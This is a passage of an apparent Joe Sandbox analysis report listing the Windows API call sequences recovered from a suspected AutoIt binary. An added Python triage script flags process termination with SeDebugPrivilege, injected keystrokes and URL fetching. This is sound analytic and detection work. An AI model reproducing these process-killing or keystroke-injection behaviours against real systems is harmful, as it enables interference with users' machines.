                                                      • API String ID: 1290815626-3381328864
                                                      APIs
                                                      Similarity
                                                      • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 1282221369-0
                                                      APIs
                                                      • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00EC5186
                                                      • ShowWindow.USER32(?,00000000), ref: 00EC51C7
                                                      • ShowWindow.USER32(?,00000005,?,00000000), ref: 00EC51CD
                                                      • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00EC51D1
                                                        • Part of subcall function 00EC6FBA: DeleteObject.GDI32(00000000), ref: 00EC6FE6
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00EC520D
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EC521A
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EC524D
                                                      • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00EC5287
                                                      • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00EC5296
                                                      Similarity
                                                      • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                      • String ID:
                                                      • API String ID: 3210457359-0
                                                      • Opcode ID: e1da3e01467206ea3a08b7ed1d9794a9ad49a1a5ef271f40e1ca783d0318fad6
                                                      • Instruction ID: 8eb1fa69c28952e31aa76f9fe6261c456093545cfa02ffd574a38cf644fd7330
                                                      • Opcode Fuzzy Hash: e1da3e01467206ea3a08b7ed1d9794a9ad49a1a5ef271f40e1ca783d0318fad6
                                                      • Instruction Fuzzy Hash: 6B51A332A41A08AEEF249F24CD49FD937F5EB05324F54601AF515B62E1C372B9D2DB41
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00E86890
                                                      • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00E868A9
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00E868B9
                                                      • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00E868D1
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00E868F2
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E48874,00000000,00000000,00000000,000000FF,00000000), ref: 00E86901
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00E8691E
                                                      • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00E48874,00000000,00000000,00000000,000000FF,00000000), ref: 00E8692D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                      • String ID:
                                                      • API String ID: 1268354404-0
                                                      • Opcode ID: 1628b0a88997ef791feb598099a779b9c978bf1e1321687e4415cd0c5991ff6f
                                                      • Instruction ID: 6f92f825a3c3f6580ace1a7d816fa7b3810cd0796db3f224acb6785f133ab759
                                                      • Opcode Fuzzy Hash: 1628b0a88997ef791feb598099a779b9c978bf1e1321687e4415cd0c5991ff6f
                                                      • Instruction Fuzzy Hash: 3851B974A00209EFDB20DF25DD45FAA3BB5FB88714F105128F90AA72A0DB71E991DB40
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EAC182
                                                      • GetLastError.KERNEL32 ref: 00EAC195
                                                      • SetEvent.KERNEL32(?), ref: 00EAC1A9
                                                        • Part of subcall function 00EAC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EAC272
                                                        • Part of subcall function 00EAC253: GetLastError.KERNEL32 ref: 00EAC322
                                                        • Part of subcall function 00EAC253: SetEvent.KERNEL32(?), ref: 00EAC336
                                                        • Part of subcall function 00EAC253: InternetCloseHandle.WININET(00000000), ref: 00EAC341
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                      • String ID:
                                                      • API String ID: 337547030-0
                                                      • Opcode ID: 5254d35cd8980f4ee7c1beb32aeb39b6a548ad6b5210f7b3732e36b8f8c1c939
                                                      • Instruction ID: 4e4218b3cc02c4a1599dbb42a0a78acd4ec529647b2b53d569a9ca2c056cd3a9
                                                      • Opcode Fuzzy Hash: 5254d35cd8980f4ee7c1beb32aeb39b6a548ad6b5210f7b3732e36b8f8c1c939
                                                      • Instruction Fuzzy Hash: 3431A371200A05EFDB219FB5DD04AA67BF8FF1D304B24542EF55AAA620D731F816DBA0
                                                      APIs
                                                        • Part of subcall function 00E93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00E93A57
                                                        • Part of subcall function 00E93A3D: GetCurrentThreadId.KERNEL32 ref: 00E93A5E
                                                        • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E925BD
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E925DB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00E925DF
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E925E9
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E92601
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00E92605
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 00E9260F
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E92623
                                                      • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00E92627
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      • Opcode ID: d366bada70214ca7ab3008fd89776880374a387ebe0206407c9cee57d187de80
                                                      • Instruction ID: 4ab3b0de65bfeb22256125e5ae276dafde611cafc91ca8000b2664b18ff4b85f
                                                      • Opcode Fuzzy Hash: d366bada70214ca7ab3008fd89776880374a387ebe0206407c9cee57d187de80
                                                      • Instruction Fuzzy Hash: EF01D830790210BBFF10676A9C8AF597FA9DB4EB11F211015F318BE1D1C9E214458A6A
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00E91449,?,?,00000000), ref: 00E9180C
                                                      • HeapAlloc.KERNEL32(00000000,?,00E91449,?,?,00000000), ref: 00E91813
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91449,?,?,00000000), ref: 00E91828
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00E91449,?,?,00000000), ref: 00E91830
                                                      • DuplicateHandle.KERNEL32(00000000,?,00E91449,?,?,00000000), ref: 00E91833
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00E91449,?,?,00000000), ref: 00E91843
                                                      • GetCurrentProcess.KERNEL32(00E91449,00000000,?,00E91449,?,?,00000000), ref: 00E9184B
                                                      • DuplicateHandle.KERNEL32(00000000,?,00E91449,?,?,00000000), ref: 00E9184E
                                                      • CreateThread.KERNEL32(00000000,00000000,00E91874,00000000,00000000,00000000), ref: 00E91868
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      • Opcode ID: 857398a8d1d4f5d2f872093610d8c72c1c9ab9619fd8c9ba1586795b88ccb7ef
                                                      • Instruction ID: 35147f5d4fa9ebc04bf99b3570dbae0d7447cef30608aa65941c529cbd54e017
                                                      • Opcode Fuzzy Hash: 857398a8d1d4f5d2f872093610d8c72c1c9ab9619fd8c9ba1586795b88ccb7ef
                                                      • Instruction Fuzzy Hash: 9101BFB5241344BFE710AB66DC4DF5B3B6CEB89B11F144461FA05EB192C6759805CB20
                                                      APIs
                                                        • Part of subcall function 00E9D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00E9D501
                                                        • Part of subcall function 00E9D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00E9D50F
                                                        • Part of subcall function 00E9D4DC: CloseHandle.KERNEL32(00000000), ref: 00E9D5DC
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBA16D
                                                      • GetLastError.KERNEL32 ref: 00EBA180
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBA1B3
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBA268
                                                      • GetLastError.KERNEL32(00000000), ref: 00EBA273
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBA2C4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: a9cc030db598005dbb20dbd435abc7abe811c1feaab0d146d71942a911b5e7a8
                                                      • Instruction ID: e661b1a914e21c75abc49494af14f5e4191a07ba3b5cbce5955cee04759e28b7
                                                      • Opcode Fuzzy Hash: a9cc030db598005dbb20dbd435abc7abe811c1feaab0d146d71942a911b5e7a8
                                                      • Instruction Fuzzy Hash: B661B570205242AFDB10DF19C494F56BBE1AF44318F1894ACE4566F7A3C772ED49CB92
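The records on this page are Joe Sandbox IDA-plugin output: for each recovered function, the Windows API calls it makes (the parenthesised values are the stack slots captured at the call, the leading ones normally being the arguments) and the strings it references. Read as sequences they describe behaviour: the record ending here pairs CreateToolhelp32Snapshot/Process32FirstW with OpenProcess(00000001 = PROCESS_TERMINATE)/TerminateProcess and the string SeDebugPrivilege, i.e. enumerate processes and kill one; the record at 00E925BD posts WM_KEYDOWN/WM_KEYUP (0x100/0x101) carrying VK_LEFT/VK_RIGHT (0x25/0x27) after AttachThreadInput; the record at 00EAC182 opens a URL through WinINet. Because the report classifies the binary as a likely compiled AutoIt script, these are plausibly the AutoIt runtime's own implementations of script functions rather than bespoke malware code, but they still tell a triager what the embedded script can do. The following Python, added here and not Joe Sandbox's or the sample's code, parses such records from the report's plain-text form and applies those three rules; SAMPLE is a constructed excerpt of records shown on this page, and the rule names and the assumption that the first captured slots are the arguments are this example's own.

```python
"""Triage helper for Joe Sandbox 'APIs' function records in plain-text form.
Added example for this page; not Joe Sandbox's or the sample's code. A record
runs from one 'APIs' heading to the next; argument lists are the stack slots
Joe Sandbox captured, and the leading slots are assumed to be the arguments.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt of three records from this page, trimmed to the lines the
# parser uses (the real report also carries dump-source and hash lines).
SAMPLE = """\
APIs
  • Part of subcall function 00E9D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 00E9D501
  • Part of subcall function 00E9D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 00E9D50F
  • Part of subcall function 00E9D4DC: CloseHandle.KERNEL32(00000000), ref: 00E9D5DC
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00EBA16D
• GetLastError.KERNEL32 ref: 00EBA180
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00EBA268
• CloseHandle.KERNEL32(00000000), ref: 00EBA2C4
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
  • Part of subcall function 00E93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00E925B3), ref: 00E93A65
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00E925DB
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00E92601
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00E92623
• String ID:
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EAC182
• GetLastError.KERNEL32 ref: 00EAC195
  • Part of subcall function 00EAC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EAC272
• String ID:
"""

# One API line: optional 'Part of subcall function <addr>:', Name.MODULE,
# optional '(slot,slot,...)', then 'ref: <addr>'.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})")
STRING_ID = re.compile(r"^\s*•\s*String ID:\s*(?P<ids>.*)$")  # '$'-separated

@dataclass
class Call:
    name: str
    module: str
    args: List[str]           # captured stack slots, '?' when unknown
    ref: str
    subcall: Optional[str]    # callee address for 'Part of subcall' lines

@dataclass
class Record:
    calls: List[Call] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)

def parse_records(text: str) -> List[Record]:
    records: List[Record] = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            records.append(Record())
        elif records:
            if (m := API_LINE.match(line)):
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                records[-1].calls.append(Call(m["name"], m["module"], args, m["ref"], m["sub"]))
            elif (m := STRING_ID.match(line)) and m["ids"].strip():
                records[-1].strings.extend(s for s in m["ids"].split("$") if s)
    return records

def arg(call: Call, i: int) -> Optional[int]:
    """Stack slot i as an int, or None when it is '?' or absent."""
    try:
        return int(call.args[i], 16)
    except (IndexError, ValueError):
        return None

PROCESS_TERMINATE = 0x0001            # OpenProcess dwDesiredAccess
WM_KEYDOWN, WM_KEYUP = 0x0100, 0x0101
VK_NAMES = {0x25: "VK_LEFT", 0x26: "VK_UP", 0x27: "VK_RIGHT", 0x28: "VK_DOWN"}

def classify(rec: Record):
    """Behaviour rules (names are this example's own) -> list of (rule, detail)."""
    names = {c.name for c in rec.calls}
    hits = []
    if "TerminateProcess" in names:
        access = [arg(c, 0) for c in rec.calls if c.name == "OpenProcess"]
        debug = "SeDebugPrivilege" in rec.strings
        if PROCESS_TERMINATE in access or debug:
            hits.append(("process_kill",
                         f"enumerates={'CreateToolhelp32Snapshot' in names} SeDebugPrivilege={debug}"))
    if "AttachThreadInput" in names and "PostMessageW" in names:
        keys = []
        for c in rec.calls:
            if c.name == "PostMessageW" and arg(c, 1) in (WM_KEYDOWN, WM_KEYUP):
                vk = arg(c, 2)
                key = VK_NAMES.get(vk, hex(vk) if vk is not None else "?")
                keys.append(f"{key}:{'down' if arg(c, 1) == WM_KEYDOWN else 'up'}")
        hits.append(("synthetic_keystrokes", " ".join(keys)))
    wininet = names & {"InternetConnectW", "InternetOpenUrlW"}
    if wininet:
        hits.append(("wininet_fetch", ",".join(sorted(wininet))))
    return hits

def triage(text: str):
    """Record index -> hits, for every record that trips at least one rule."""
    return {i: h for i, r in enumerate(parse_records(text)) if (h := classify(r))}

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE).items():
        for rule, detail in hits:
            print(f"record {idx}: {rule}  {detail}")
```

Feed it the text of a whole "APIs" section (copied out of the report) and it yields one line per flagged function, so the process-kill, keystroke-injection and URL-fetch routines can be located by record index and cross-checked against the Opcode ID of each block. The rules deliberately key on argument values, not just API names: OpenProcess with PROCESS_TERMINATE plus TerminateProcess is a stronger signal than either call alone.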
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00EC3925
                                                      • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00EC393A
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EC3954
                                                      • _wcslen.LIBCMT ref: 00EC3999
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00EC39C6
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EC39F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcslen
                                                      • String ID: SysListView32
                                                      • API String ID: 2147712094-78025650
                                                      • Opcode ID: 8e99545a2875ffcbf08f9e6df3aab646b62dc352bd013d54acff65aa0e4c6a6a
                                                      • Instruction ID: 941883fabbf33e3f12f0d738bbbd4f1fb7ae6b94520871c85816165ebf021891
                                                      • Opcode Fuzzy Hash: 8e99545a2875ffcbf08f9e6df3aab646b62dc352bd013d54acff65aa0e4c6a6a
                                                      • Instruction Fuzzy Hash: AB41C231A00208ABDF219F64CD45FEA7BA9FF48354F10552AF948F7281D7729A85CB90
                                                      APIs
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E9BCFD
                                                      • IsMenu.USER32(00000000), ref: 00E9BD1D
                                                      • CreatePopupMenu.USER32 ref: 00E9BD53
                                                      • GetMenuItemCount.USER32(011B5240), ref: 00E9BDA4
                                                      • InsertMenuItemW.USER32(011B5240,?,00000001,00000030), ref: 00E9BDCC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                      • String ID: 0$2
                                                      • API String ID: 93392585-3793063076
                                                      • Opcode ID: 16848750844a8d37d82a55827ff75c08b72bd29229b5396b5b1c6bb5a64ff4ef
                                                      • Instruction ID: ef12d867b235b8921100b4a6181bc34ae4905968a0e13dbb88da38b7c151d9c5
                                                      • Opcode Fuzzy Hash: 16848750844a8d37d82a55827ff75c08b72bd29229b5396b5b1c6bb5a64ff4ef
                                                      • Instruction Fuzzy Hash: 7551BF70A002099BDF10DFA9EA88BEEBBF8BF45318F245169E405F7290D7709945CB61
                                                      APIs
                                                      • _ValidateLocalCookies.LIBCMT ref: 00E52D4B
                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00E52D53
                                                      • _ValidateLocalCookies.LIBCMT ref: 00E52DE1
                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00E52E0C
                                                      • _ValidateLocalCookies.LIBCMT ref: 00E52E61
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                      • String ID: &H$csm
                                                      • API String ID: 1170836740-1242228090
                                                      • Opcode ID: e686417463f5328d970938cd716259fde60df47417ededf5f2c5a467535b50d8
                                                      • Instruction ID: df85f41f30cfba28989063d21767f6ed5bd6b6881e43996d51cdfba471349b5a
                                                      • Opcode Fuzzy Hash: e686417463f5328d970938cd716259fde60df47417ededf5f2c5a467535b50d8
                                                      • Instruction Fuzzy Hash: D441D834A00208DBCF14DF68C845A9EBBF4BF4631AF149559EE147B392D731AA09CBD0
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00E9C913
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: fca8bdfd6aa5920f38fb67c691816600c8ab9e883527e324671d601f61f061d0
                                                      • Instruction ID: 2d611d74db4ec1336da32fcbc0ee15a85b1825109f3297a073255fcf8883a7b0
                                                      • Opcode Fuzzy Hash: fca8bdfd6aa5920f38fb67c691816600c8ab9e883527e324671d601f61f061d0
                                                      • Instruction Fuzzy Hash: BC11D53268930ABBAB05BB549C82CAA77DCDF1535DB30242BF904B62C2E7A16E415364
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$LocalTime
                                                      • String ID:
                                                      • API String ID: 952045576-0
                                                      • Opcode ID: 74e8364881a888eb61b7a575dc56ea41bf3019e2093e07c78fb3064581ba2cc2
                                                      • Instruction ID: 1019ac31052da8be2c29c044912b897338474cf50b53552cfa61b8ecf0b39e7d
                                                      • Opcode Fuzzy Hash: 74e8364881a888eb61b7a575dc56ea41bf3019e2093e07c78fb3064581ba2cc2
                                                      • Instruction Fuzzy Hash: 04419265C1011865CB11EBB48C8A9CFB7ECEF45311F50A866EA14F3261FB34D249C3A5
                                                      APIs
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00E4F953
                                                      • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00E8F3D1
                                                      • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00E8682C,00000004,00000000,00000000), ref: 00E8F454
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                       • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ShowWindow
                                                      • String ID:
                                                      • API String ID: 1268545403-0
                                                      • Opcode ID: 42c835bad1e3cb58e239dfbf02a5e5deb96d530e27c7ec176d627c8e4291a0ea
                                                      • Instruction ID: ad6a432cace2f572a8181cf6bfa31bbe5d5e9e31c6dd09aee477362ca0b1c5e7
                                                      • Opcode Fuzzy Hash: 42c835bad1e3cb58e239dfbf02a5e5deb96d530e27c7ec176d627c8e4291a0ea
                                                      • Instruction Fuzzy Hash: E5412C30504640BED7359F79A988B6A7BD1ABD5B18F14603DE24F76560C672E481C711
                                                      APIs
                                                      • DeleteObject.GDI32(00000000), ref: 00EC2D1B
                                                      • GetDC.USER32(00000000), ref: 00EC2D23
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00EC2D2E
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00EC2D3A
                                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00EC2D76
                                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00EC2D87
